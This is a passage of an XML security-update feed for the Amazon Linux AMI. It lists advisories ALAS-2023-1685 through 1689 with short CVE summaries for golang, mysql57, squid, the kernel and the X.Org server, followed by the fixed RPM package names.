release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-ldap-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-openssl-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-sqlite-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-nss-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-freetds-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-debuginfo" 
version="1.5.4" release="6.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/apr-util-debuginfo-1.5.4-6.19.amzn1.x86_64.rpm</filename></package><package name="apr-util-devel" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-devel-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-openssl" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-openssl-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-sqlite" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-sqlite-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-freetds" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-freetds-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-ldap" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-ldap-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-mysql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-mysql-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-pgsql" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-pgsql-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-debuginfo" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-debuginfo-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-nss" version="1.5.4" release="6.19.amzn1" epoch="0" arch="i686"><filename>Packages/apr-util-nss-1.5.4-6.19.amzn1.i686.rpm</filename></package><package name="apr-util-odbc" version="1.5.4" release="6.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/apr-util-odbc-1.5.4-6.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1685</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1685: medium priority package update for golang</title><issued date="2023-02-15 00:23:00" /><updated date="2023-02-15 00:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23806:
A flaw was found in the elliptic package of the crypto library in golang, where the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.
CVE-2022-23773:
cmd/go in Go before 1.16.14 and 1.17.x before 1.17.7 can misinterpret branch names that falsely appear to be version tags. This can lead to incorrect access control if an actor is supposed to be able to create branches but not tags.
CVE-2022-23772:
Rat.SetString in math/big in Go before 1.16.14 and 1.17.x before 1.17.7 has an overflow that can lead to Uncontrolled Memory Consumption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23772" title="" id="CVE-2022-23772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23773" title="" id="CVE-2022-23773" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23806" title="" id="CVE-2022-23806" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-tests" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.16.15" release="1.38.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.16.15-1.38.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.16.15" release="1.38.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.16.15-1.38.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.16.15" release="1.38.amzn1" epoch="0" 
arch="i686"><filename>Packages/golang-bin-1.16.15-1.38.amzn1.i686.rpm</filename></package><package name="golang-shared" version="1.16.15" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.16.15-1.38.amzn1.i686.rpm</filename></package><package name="golang" version="1.16.15" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.16.15-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1686</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1686: medium priority package update for mysql57</title><issued date="2023-02-17 00:02:00" /><updated date="2023-06-07 18:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21963:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Connection Handling). Supported versions that are affected are 5.7.40 and prior and 8.0.31 and prior. An easily exploitable vulnerability allows a high-privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).
CVE-2023-21840:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: PS). Supported versions that are affected are 5.7.40 and prior. An easily exploitable vulnerability allows a high-privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
CVE-2021-2180:
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.33 and prior and 8.0.23 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-2180" title="" id="CVE-2021-2180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21840" title="" id="CVE-2023-21840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21963" title="" id="CVE-2023-21963" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-debuginfo" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-test" version="5.7.41" release="1.18.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-test-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.41-1.18.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-common" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.41" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.41-1.18.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.41" release="1.18.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-errmsg-5.7.41-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1687</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1687: medium priority package update for squid</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41317:
A flaw was found in squid. A trusted client can directly access the cache manager information, bypassing the manager ACL protection and resulting in information disclosure.
CVE-2021-33620:
Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.
CVE-2021-31808:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.
CVE-2021-31807:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.
CVE-2021-31806:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.
CVE-2021-28652:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that, over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege.
CVE-2021-28651:
An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28651" title="" id="CVE-2021-28651" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28652" title="" id="CVE-2021-28652" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31806" title="" id="CVE-2021-31806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31807" title="" id="CVE-2021-31807" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31808" title="" id="CVE-2021-31808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33620" title="" id="CVE-2021-33620" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41317" title="" id="CVE-2022-41317" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.44.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.44.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.44.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.44.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.44.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.44.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.44.amzn1" epoch="7" 
arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1688</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1688: important priority package update for kernel</title><issued date="2023-02-17 00:02:00" /><updated date="2024-05-09 17:43:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4155:
A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them.
CVE-2021-4002:
A memory leak flaw in the Linux kernel's hugetlbfs memory usage was found in the way the user maps some regions of memory twice using shmget() which are aligned to PUD alignment with the fault of some of the memory pages. A local user could use this flaw to get unauthorized access to some data.
CVE-2021-3923:
A flaw was found in the Linux kernel's implementation of RDMA over infiniband. An attacker with a privileged local account can leak kernel stack information when issuing commands to the /dev/infiniband/rdma_cm device node. While this access is unlikely to leak sensitive user information, it can be further used to defeat existing kernel protection mechanisms.
CVE-2021-3772:
A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses.
CVE-2021-28715:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken to avoid piling up too much data, but those can be bypassed by the guest: there is a timeout for how long the client side of an interface can stop consuming new packets before it is assumed to have stalled, but this timeout is rather long (60 seconds by default). Using a UDP connection on a fast interface can easily accumulate gigabytes of data in that time.
CVE-2021-28714:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. There are some measures taken to avoid piling up too much data, but those can be bypassed by the guest: the timeout could even never trigger if the guest manages to have only one free slot in its RX queue ring page and the next packet would require more than one free slot, which may be the case when using GSO, XDP, or software hashing.
CVE-2021-28713:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28712:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28711:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-20322:
A flaw in the processing of received ICMP errors (ICMP fragment needed and ICMP redirect) in the Linux kernel functionality was found to allow the ability to quickly scan open UDP ports. This flaw allows an off-path remote user to effectively bypass the source port UDP randomization. The highest threat from this vulnerability is to confidentiality and possibly integrity, because software that relies on UDP source port randomization is indirectly affected as well.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20322" title="" id="CVE-2021-20322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28711" title="" id="CVE-2021-28711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28712" title="" id="CVE-2021-28712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28713" title="" id="CVE-2021-28713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28714" title="" id="CVE-2021-28714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28715" title="" id="CVE-2021-28715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3772" title="" id="CVE-2021-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3923" title="" id="CVE-2021-3923" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4002" title="" id="CVE-2021-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4155" title="" id="CVE-2021-4155" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.262" release="135.486.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.262-135.486.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.262" 
release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.262-135.486.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.486.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.262-135.486.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1689</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1689: important priority package update for xorg-x11-server</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-46344:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIChangeProperty request has a length-validation issue, resulting in out-of-bounds memory reads and potential information disclosure. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46343:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the ScreenSaverSetAttributes request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46342:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XvdiSelectVideoNotify request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X se
CVE-2022-46341:
A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIPassiveUngrab request accesses out-of-bounds memory when invoked with a high keycode or button code. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-46340:
A vulnerability was found in X.Org. This security flaw occurs because the swap handler for the XTestFakeInput request of the XTest extension may corrupt the stack if GenericEvents with lengths larger than 32 bytes are sent through the XTestFakeInput request. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions. This issue does not affect systems where client and server use the same byte order.
CVE-2022-4283:
A vulnerability was found in X.Org. This security flaw occurs because the XkbCopyNames function left a dangling pointer to freed memory, resulting in out-of-bounds memory access on subsequent XkbGetKbdByName requests. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.
CVE-2022-2320:
A flaw was found in the Xorg-x11-server. The specific flaw exists within the handling of ProcXkbSetDeviceInfo requests. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. This flaw allows an attacker to escalate privileges and execute arbitrary code in the context of root.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2320" title="" id="CVE-2022-2320" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4283" title="" id="CVE-2022-4283" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46340" title="" id="CVE-2022-46340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46341" title="" id="CVE-2022-46341" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46342" title="" id="CVE-2022-46342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46343" title="" id="CVE-2022-46343" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46344" title="" id="CVE-2022-46344" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.50.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.50.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" 
release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.50.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.50.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.50.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.50.amzn1" epoch="0" 
